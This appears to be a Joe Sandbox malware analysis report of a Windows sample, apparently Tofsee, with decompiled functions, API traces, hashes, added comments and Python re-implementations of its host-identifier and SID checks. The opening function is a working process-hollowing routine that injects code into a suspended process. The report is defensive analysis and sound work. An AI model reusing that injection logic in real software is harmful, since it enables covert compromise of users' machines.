control_flow_graph 470 40977c-4097b9 call 40ee2a CreateProcessA 473 4097c2-4097f3 call 40ee2a GetThreadContext 470->473 474 4097bb-4097bd 470->474 478 409801-40981c call 40637c 473->478 479 4097f5 473->479 475 409864-409866 474->475 480 4097f6-4097ff TerminateProcess 478->480 483 40981e-409839 WriteProcessMemory 478->483 479->480 480->474 483->479 484 40983b-409856 SetThreadContext 483->484 484->479 485 409858-409863 ResumeThread 484->485 485->475
C-Code - Quality: 84%
E0040977C(void* __ecx, CHAR* _a4) {
	struct _PROCESS_INFORMATION _v20;
	void _v24;
	char _v28;
	struct _STARTUPINFOA _v96;
	struct _CONTEXT _v812;
	int _t26;
	int _t30;
	void* _t33;
	int _t39;
	int _t42;

	_t46 = __ecx;
	E0040EE2A(__ecx,  &_v96, 0, 0x44);
	_v96.cb = 0x44;
	_t26 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20); // executed
	if(_t26 != 0) {
		E0040EE2A(_t46,  &_v812, 0, 0x2cc);
		_v812.ContextFlags = 0x10002;
		_t30 = GetThreadContext(_v20.hThread,  &_v812); // executed
		if(_t30 != 0) {
			_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24); // executed
			_push(0);
			if(_t33 == 0) {
				L4:
				TerminateProcess(_v20.hProcess, ??);
				goto L1;
			}
			_t39 = WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??); // executed
			if(_t39 == 0) {
				goto L3;
			}
			_v812.Eax = _v28;
			_t42 = SetThreadContext(_v20.hThread,  &_v812); // executed
			if(_t42 == 0) {
				goto L3;
			}
			ResumeThread(_v20.hThread); // executed
			return 1;
		}
		L3:
		_push(0);
		goto L4;
	}
	L1:
	return 0;
}

APIs
• CreateProcessA.KERNELBASE(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,004122F8), ref: 004097B1
• GetThreadContext.KERNELBASE(?,?,?,?,?,?,?,004122F8), ref: 004097EB
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 004097F9
• WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 00409831
• SetThreadContext.KERNELBASE(?,00010002,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040984E
• ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040985B
Strings
Memory Dump Source
• Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
• String ID: D
• API String ID: 2981417381-2746444292
• Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
• Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
• Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
• Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 498 404000-404008 499 40400b-40402a CreateFileA 498->499 500 404057 499->500 501 40402c-404035 GetLastError 499->501 504 404059-40405c 500->504 502 404052 501->502 503 404037-40403a 501->503 506 404054-404056 502->506 503->502 505 40403c-40403f 503->505 504->506 505->504 507 404041-404050 Sleep 505->507 507->499 507->502
C-Code - Quality: 100%
E00404000(CHAR* _a4, signed int* _a8) {
	void* _t3;
	long _t6;
	void* _t8;
	signed int* _t9;

	_t9 = _a8;
	_t8 = 0;
	 *_t9 =  *_t9 | 0xffffffff;
	while(1) {
		_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
		if(_t3 != 0xffffffff) {
			break;
		}
		_t6 = GetLastError();
		if(_t6 == 2 || _t6 == 3) {
			L6:
			return 0;
		} else {
			if(_t6 == 5) {
				L9:
				return 1;
			}
			Sleep(0x1f4);
			_t8 = _t8 + 1;
			if(_t8 < 0xa) {
				continue;
			}
			goto L6;
		}
	}
	 *_t9 = _t3;
	goto L9;
}

APIs
• CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,004122F8,004042B6,00000000,00000001,004122F8,00000000,?,004098FD), ref: 00404021
• GetLastError.KERNEL32(?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 0040402C
• Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404046
Memory Dump Source
• Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: CreateErrorFileLastSleep
• String ID:
• API String ID: 408151869-0
• Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
• Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
• Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
• Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
E0040EC54() {
	long _v8;
	struct _FILETIME _v16;
	signed int _t11;

	GetSystemTimeAsFileTime( &_v16);
	GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
	_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
	 *0x4136cc = _t11;
	return _t11;
}

APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
• GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
• GetTickCount.KERNEL32 ref: 0040EC78
Memory Dump Source
• Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: Time$CountFileInformationSystemTickVolume
• String ID:
• API String ID: 1209300637-0
• Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
• Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
• Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Basic blocks (address range, calls): 526 406dc2-406dd5; 527 406e33-406e35; 528 406dd7-406df1 (call 406cc9, call 40ef00); 533 406df4-406df9; 534 406dfb-406e00; 535 406e02-406e22 (GetVolumeInformationA); 536 406e24; 537 406e2e
                                                                                • Edges: 526->527, 526->528, 528->533, 533->533, 533->534, 534->535, 534->536, 535->536, 535->537, 536->537, 537->527
                                                                                C-Code - Quality: 100%
                                                                                			E00406DC2(void* __ecx) {
                                                                                				char _v261;      // byte 3 of the path buffer below
                                                                                				char _v264;      // start of the path buffer that receives the system directory
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr* _t10;
                                                                                				int _t13;
                                                                                				intOrPtr _t20;
                                                                                				void* _t21;
                                                                                
                                                                                				_t6 =  *0x412f0c; // 0x7d255ce3 (value in the dump): cached volume serial of the system drive
                                                                                				if(_t6 == 0) {
                                                                                					// E00406CC9 resolves the system directory (GetSystemWow64DirectoryA via GetProcAddress,
                                                                                					// otherwise GetSystemDirectoryA / GetWindowsDirectoryA); E0040EF00 copies it into _v264
                                                                                					E0040EF00( &_v264, E00406CC9(__ecx));
                                                                                					// inline strlen: _t10 - _t21 is the length of the copied path
                                                                                					_t10 =  &_v264;
                                                                                					_t21 = _t10 + 1;
                                                                                					do {
                                                                                						_t20 =  *_t10;
                                                                                						_t10 = _t10 + 1;
                                                                                					} while (_t20 != 0);
                                                                                					if(_t10 - _t21 < 3) {
                                                                                						L5:
                                                                                						// fallback when the path is shorter than 3 bytes or the volume query fails: "aaaa"
                                                                                						 *0x412f0c = 0x61616161;
                                                                                					} else {
                                                                                						// NUL at byte 3 truncates e.g. "C:\Windows\SysWOW64\" to the root path "C:\"
                                                                                						_v261 = 0;
                                                                                						// fourth argument is lpVolumeSerialNumber; it points at *0x412f0c (inferred from the reload
                                                                                						// below), which the report printed as the string "\%}" (the DWORD 0x7d255ce3 read as text)
                                                                                						_t13 = GetVolumeInformationA( &_v264, 0, 0, "\%}", 0, 0, 0, 0); // executed
                                                                                						if(_t13 == 0) {
                                                                                							goto L5;
                                                                                						}
                                                                                					}
                                                                                					_t6 =  *0x412f0c; // 0x7d255ce3
                                                                                				}
                                                                                				return _t6;
                                                                                			}


                                                                                APIs
                                                                                  • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                  • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                  • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                  • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,\%},00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                • String ID: \%}
                                                                                • API String ID: 1823874839-2294156228
                                                                                • Opcode ID: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
                                                                                • Instruction ID: 46d685041afc82653286dae93d5fe3173771f16ecf38a4b71df535c97c95e6ed
                                                                                • Opcode Fuzzy Hash: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
                                                                                • Instruction Fuzzy Hash: 55F028B9104218AFD710DB68DDC5ED777ADD704308F008476E242E3141D6B89D984B5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
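The two derivations above (the seed in E0040EC54 and the cached volume identifier in E00406DC2) re-implemented in Python so that the expected values can be recomputed on a triage host without running the sample. This is an added example, not code from the sample or from the report: the function names, the `volume_serial` callback and the inputs used in the `__main__` block are assumptions; only the constants, the 3-byte truncation and the XOR/mask come from the decompiled functions.

```python
"""Re-implementation of the value derivations in E0040EC54 and E00406DC2.

Added example; not code from the sample or the report. Function names, the
`volume_serial` callback and the sample inputs are our own assumptions.
"""
import sys
from typing import Callable, Optional

# E00406DC2 stores this when the system path is shorter than 3 bytes or
# GetVolumeInformationA fails ("aaaa" as a little-endian DWORD).
FALLBACK_ID = 0x61616161


def derive_volume_id(system_dir: str,
                     volume_serial: Callable[[str], Optional[int]]) -> int:
    """Mirror of E00406DC2 (value cached at 0x412f0c in the sample).

    The sample copies the system directory into a stack buffer, writes a NUL
    at byte 3 (so "C:\\Windows\\SysWOW64\\" becomes the root "C:\\") and asks
    GetVolumeInformationA for that root's serial number. `volume_serial`
    stands in for the API call: it returns the serial, or None on failure.
    """
    if len(system_dir) < 3:          # inline strlen < 3 -> fallback constant
        return FALLBACK_ID
    root = system_dir[:3]            # _v261 = 0 truncates the ANSI path after 3 bytes
    serial = volume_serial(root)
    if serial is None:               # GetVolumeInformationA returned 0 -> fallback constant
        return FALLBACK_ID
    return serial & 0xFFFFFFFF


def derive_seed(tick_count: int, filetime_high: int, volume_serial: int) -> int:
    """Mirror of E0040EC54: (GetTickCount ^ FILETIME.dwHighDateTime ^ serial) & 0x7fffffff.

    E0040EC54 queries the volume of the current directory (lpRootPathName = NULL),
    not necessarily the system drive used by E00406DC2.
    """
    return (tick_count ^ filetime_high ^ volume_serial) & 0x7FFFFFFF


def win32_volume_serial(root: str) -> Optional[int]:
    """Real lookup for a Windows triage host: GetVolumeInformationW via ctypes.

    Returns None off Windows or when the API fails, which is exactly the
    condition that sends E00406DC2 to its fallback constant.
    """
    if sys.platform != "win32":
        return None
    import ctypes
    from ctypes import wintypes
    serial = wintypes.DWORD(0)
    ok = ctypes.windll.kernel32.GetVolumeInformationW(
        root, None, 0, ctypes.byref(serial), None, None, None, 0)
    return serial.value if ok else None


if __name__ == "__main__":
    # Constructed inputs; the serial is the value the report shows at 0x412f0c.
    bot_id = derive_volume_id("C:\\Windows\\SysWOW64\\", lambda root: 0x7D255CE3)
    print("volume id: 0x%08x" % bot_id)
    print("seed:      0x%08x" % derive_seed(0x00012345, 0x01D93F00, bot_id))
    print("live:      %r" % win32_volume_serial("C:\\"))
```

On a Windows host, `derive_volume_id(os.environ["SystemRoot"] + "\\System32\\", win32_volume_serial)` yields the identifier the sample would cache; anywhere else the callback returns None and the fallback constant 0x61616161 comes out, which is the same value an analyst should expect from the sample when the volume query is blocked.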

                                                                                Control-flow Graph

                                                                                • Basic blocks (address range, calls): 538 406e36-406e5d (GetUserNameW); 539 406ebe-406ec2; 540 406e5f-406e95 (LookupAccountNameW); 541 406e97-406e9b; 542 406ebb-406ebd; 543 406e9d-406ea3; 544 406ea5-406eaa; 545 406eb7-406eb9; 546 406eac-406eb0; 547 406eb2-406eb5
                                                                                • Edges: 538->539, 538->540, 540->539, 540->541, 541->542, 541->543, 542->539, 543->542, 543->544, 544->545, 544->546, 545->539, 546->542, 546->547, 547->542, 547->545
                                                                                C-Code - Quality: 100%
                                                                                			E00406E36(intOrPtr _a4, intOrPtr _a8) {
                                                                                				long _v8;                  // cbSid on input, SID size in bytes on output
                                                                                				long _v12;                 // cchReferencedDomainName
                                                                                				union _SID_NAME_USE _v16;  // peUse
                                                                                				intOrPtr _v60;             // SID buffer + 24: SubAuthority[4]
                                                                                				intOrPtr _v76;             // SID buffer + 8: SubAuthority[0]
                                                                                				void _v84;                 // SID buffer (Revision, SubAuthorityCount, IdentifierAuthority[6], SubAuthority[])
                                                                                				short _v340;               // ReferencedDomainName, WCHAR[0x80]
                                                                                				short _v860;               // user name, WCHAR[0x104]
                                                                                				int _t20;
                                                                                				int _t28;
                                                                                				intOrPtr _t30;
                                                                                				signed int _t31;
                                                                                				signed int _t32;
                                                                                
                                                                                				_t32 = _t31 | 0xffffffff;  // result -1: one of the two API calls failed
                                                                                				_v8 = 0x104;
                                                                                				_t20 = GetUserNameW( &_v860,  &_v8); // executed
                                                                                				if(_t20 != 0) {
                                                                                					_v8 = 0x7c;    // SID buffer size
                                                                                					_v12 = 0x80;   // domain name buffer size in characters
                                                                                					_t28 = LookupAccountNameW(0,  &_v860,  &_v84,  &_v8,  &_v340,  &_v12,  &_v16); // executed
                                                                                					if(_t28 != 0) {
                                                                                						// a SID shorter than 12 bytes has no sub-authority; otherwise SubAuthority[0] must equal _a4
                                                                                						if(_v8 < 0xc || _v76 != _a4) {
                                                                                							L8:
                                                                                							_t32 = 1;  // no match
                                                                                						} else {
                                                                                							_t30 = _a8;
                                                                                							// _a8 == 0 skips the second test; otherwise the SID needs at least 5 sub-authorities
                                                                                							// (28 bytes) and SubAuthority[4] must equal _a8 (for S-1-5-21-X-Y-Z-RID that is the RID)
                                                                                							if(_t30 == 0 || _v8 >= 0x1c && _v60 == _t30) {
                                                                                								_t32 = 0;  // match
                                                                                							} else {
                                                                                								goto L8;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t32;
                                                                                			}


                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,00401FA1), ref: 00406E55
                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,00000000,00000012), ref: 00406E8D
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountLookupUser
                                                                                • String ID:
                                                                                • API String ID: 2370142434-0
                                                                                • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction ID: d69833bf2c7126fc9b7bd4b1d5117f4fe90a033eeaed535c4400ab00b2689cfd
                                                                                • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction Fuzzy Hash: 0211F776900218EBDF21CFD4C884ADFB7BCAB04741F1542B6E502F6290DB749B989BE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
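The comparison in E00406E36 is easier to read against the binary SID layout it indexes (offset 8 is SubAuthority[0], offset 24 is SubAuthority[4], 12 and 28 bytes are the minimum sizes for those fields to exist). The following added example, which is not code from the sample or the report, builds SIDs in that layout and mirrors the check; the `first_sub`/`fifth_sub` values used (21 and RID 500) are assumptions, since the report does not show what the sample passes as _a4 and _a8.

```python
"""Binary SID layout and the comparison made by E00406E36.

Added example, not code from the sample or the report. The SIDs built below
are constructed test values and the _a4/_a8 values are assumptions.
"""
import struct
import sys
from typing import List, Optional


def build_sid(identifier_authority: int, sub_authorities: List[int]) -> bytes:
    """Serialise a SID: Revision(1) SubAuthorityCount(1) IdentifierAuthority(6, big-endian)
    followed by SubAuthority[n] (4 bytes each, little-endian)."""
    return (bytes([1, len(sub_authorities)])
            + identifier_authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in sub_authorities))


def sid_to_string(sid: bytes) -> str:
    """S-R-I-S0-S1-... textual form, for display."""
    revision, count = sid[0], sid[1]
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def tofsee_sid_check(sid: Optional[bytes], first_sub: int, fifth_sub: int) -> int:
    """Mirror of E00406E36.

    sid       -- raw SID that LookupAccountNameW wrote into the 0x7c-byte buffer (_v84),
                 or None to model GetUserNameW/LookupAccountNameW failing
    first_sub -- _a4, compared with SubAuthority[0] (buffer offset 8, read as _v76)
    fifth_sub -- _a8, compared with SubAuthority[4] (buffer offset 24, read as _v60);
                 0 disables that second test
    Returns 0 on match, 1 on mismatch and -1 on API failure, as the sample does.
    """
    if sid is None:
        return -1
    size = len(sid)                                  # cbSid written back into _v8
    if size < 0x0C or struct.unpack_from("<I", sid, 8)[0] != first_sub:
        return 1                                     # no sub-authority at all, or S0 differs
    if fifth_sub == 0:
        return 0
    if size >= 0x1C and struct.unpack_from("<I", sid, 24)[0] == fifth_sub:
        return 0                                     # 5+ sub-authorities and S4 (the RID) matches
    return 1


def current_user_sid() -> Optional[bytes]:
    """Live equivalent of the two API calls for a Windows triage host
    (returns None elsewhere or when either call fails)."""
    if sys.platform != "win32":
        return None
    import ctypes
    from ctypes import wintypes
    advapi32 = ctypes.windll.advapi32
    name_len = wintypes.DWORD(0x104)
    name = ctypes.create_unicode_buffer(0x104)
    if not advapi32.GetUserNameW(name, ctypes.byref(name_len)):
        return None
    sid = ctypes.create_string_buffer(0x7C)
    sid_len = wintypes.DWORD(0x7C)
    domain = ctypes.create_unicode_buffer(0x80)
    domain_len = wintypes.DWORD(0x80)
    use = wintypes.DWORD(0)
    if not advapi32.LookupAccountNameW(None, name, sid, ctypes.byref(sid_len),
                                        domain, ctypes.byref(domain_len), ctypes.byref(use)):
        return None
    return sid.raw[:sid_len.value]


if __name__ == "__main__":
    # Constructed SIDs plus, on Windows, the real current-user SID.
    for label, sid in [("domain admin", build_sid(5, [21, 1111, 2222, 3333, 500])),
                       ("domain user", build_sid(5, [21, 1111, 2222, 3333, 1001])),
                       ("LocalSystem", build_sid(5, [18])),
                       ("live", current_user_sid())]:
        result = tofsee_sid_check(sid, 21, 500)
        print("%-12s %-32s -> %d" % (label, sid_to_string(sid) if sid else "n/a", result))
```

Two details the table of offsets makes visible: a well-known SID such as S-1-5-18 passes the first test when `first_sub` is 18 but can never pass the second, because it is only 12 bytes long; and a built-in group SID such as S-1-5-32-544 fails immediately because SubAuthority[0] is 32, so the RID in SubAuthority[1] is never examined.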

                                                                                Control-flow Graph

                                                                                • Basic blocks (address range, calls): 548 e30e0f-e30e24 (SetErrorMode x2); 549 e30e26; 550 e30e2b-e30e2c
                                                                                • Edges: 548->549, 548->550, 549->550
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,00E30223,?,?), ref: 00E30E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,00E30223,?,?), ref: 00E30E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: e574d1152b94b3207e26eda2da96dc279aaa467c8c2ce42aca6242fe21b8d60c
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: 6FD0123124512877DB003A95DC0DBCD7F1CDF05B66F008411FB0DE9080C770994046E5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Basic blocks (address range, calls): 551 409892-4098c0; 552 4098c2-4098c5; 553 4098d9; 554 4098c7-4098d7; 555 4098e0-4098f1 (SetServiceStatus)
                                                                                • Edges: 551->552, 551->553, 552->553, 552->554, 553->555, 554->555
                                                                                C-Code - Quality: 100%
                                                                                			E00409892(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                				intOrPtr _t6;
                                                                                				int _t7;
                                                                                				signed int _t8;
                                                                                
                                                                                				// 0x413394 is a SERVICE_STATUS; the globals written below are its fields
                                                                                				// (+4 dwCurrentState, +8 dwControlsAccepted, +0xc dwWin32ExitCode, +0x14 dwCheckPoint, +0x18 dwWaitHint)
                                                                                				_t6 = _a4;
                                                                                				 *0x413398 = _t6;                        // dwCurrentState
                                                                                				 *0x41339c = 0 | _t6 != 0x00000002;      // dwControlsAccepted: SERVICE_ACCEPT_STOP (1) unless SERVICE_START_PENDING (2)
                                                                                				 *0x4133a0 = _a8;                        // dwWin32ExitCode
                                                                                				 *0x4133ac = _a12;                       // dwWaitHint
                                                                                				if(_t6 == 4 || _t6 == 1) {               // SERVICE_RUNNING or SERVICE_STOPPED
                                                                                					 *0x4133a8 =  *0x4133a8 & 0x00000000; // dwCheckPoint = 0
                                                                                				} else {
                                                                                					_t8 =  *0x41204c; // 0x2
                                                                                					 *0x41204c =  *0x41204c + 1;          // pending states report an increasing checkpoint
                                                                                					 *0x4133a8 = _t8;
                                                                                				}
                                                                                				_t7 = SetServiceStatus( *0x413390, 0x413394); // executed; *0x413390 is the SERVICE_STATUS_HANDLE
                                                                                				return _t7;
                                                                                			}


                                                                                APIs
                                                                                • SetServiceStatus.SECHOST(00413394), ref: 004098EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ServiceStatus
                                                                                • String ID:
                                                                                • API String ID: 3969395364-0
                                                                                • Opcode ID: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                • Instruction ID: dd676a4af3dd8f9e000b524091363a81fd6157f1888c947a943bd607f736cbf1
                                                                                • Opcode Fuzzy Hash: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                • Instruction Fuzzy Hash: 02F0F271514208EFCB18CF14E89869A7BA0F348706B20C83EE82AD2371CB749A80DF0D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Basic blocks (address range, calls): 556 e30920-e30929 (TerminateProcess)
                                                                                APIs
                                                                                • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00E30929
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessTerminate
                                                                                • String ID:
                                                                                • API String ID: 560597551-0
                                                                                • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                                                                                • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Basic blocks (address range, calls): 557 4098f2-4098f4; 558 4098f6-409902 (call 404280); 561 409904-409913 (Sleep); 562 409917; 563 409915; 564 409919-409942 (call 402544, call 40977c); 565 40995e-409960; 569 409947-409957 (call 40ee2a)
                                                                                • Edges: 557->558, 558->561, 558->562, 561->558, 561->563, 562->564, 562->565, 563->562, 564->569, 569->565
                                                                                C-Code - Quality: 88%
                                                                                			E004098F2(void* __ecx) {
                                                                                				void* _t1;
                                                                                				void* _t4;
                                                                                				void* _t5;
                                                                                				void* _t6;
                                                                                				void* _t7;
                                                                                				void* _t15;
                                                                                
                                                                                				_t5 = __ecx;
                                                                                				_t6 = 0;
                                                                                				while(1) {
                                                                                					_t1 = E00404280(_t5, 1); // executed
                                                                                					_t7 = _t1;
                                                                                					_pop(_t5);
                                                                                					if(_t7 != 0) {
                                                                                						break;
                                                                                					}
                                                                                					Sleep(0x3e8);
                                                                                					_t6 = _t6 + 1;
                                                                                					if(_t6 < 0xa) {
                                                                                						continue;
                                                                                					} else {
                                                                                						_t15 = _t7;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				if(_t15 < 0) {
                                                                                					_push(0);
                                                                                					 *0x41201f = 1;
                                                                                					E0040977C(_t5, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8)); // executed
                                                                                					_t4 = E0040EE2A(_t5, 0x4122f8, 0, 0x100);
                                                                                					 *0x41201f = 0;
                                                                                					return _t4;
                                                                                				}
                                                                                				return _t1;
                                                                                			}
                                                                                APIs
                                                                                  • Part of subcall function 00404280: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                • Sleep.KERNEL32(000003E8,00000100,004122F8,0040A3C7), ref: 00409909
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventSleep
                                                                                • String ID:
                                                                                • API String ID: 3100162736-0
                                                                                • Opcode ID: 4d41be995d42169e7907864f945f5cc175d4e7c56b3013806251050fc082db50
                                                                                • Instruction ID: e56085e6bf9507d1b9c0d1fa6774ae3e34a200a1ca8b69066151cd7271dcc025
                                                                                • Opcode Fuzzy Hash: 4d41be995d42169e7907864f945f5cc175d4e7c56b3013806251050fc082db50
                                                                                • Instruction Fuzzy Hash: 58F05472A81360A6E62226566C07F8F19040B95B24F05417EF744BA2C395E8495141ED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00E365F6
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00E36610
                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 00E36631
                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00E36652
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
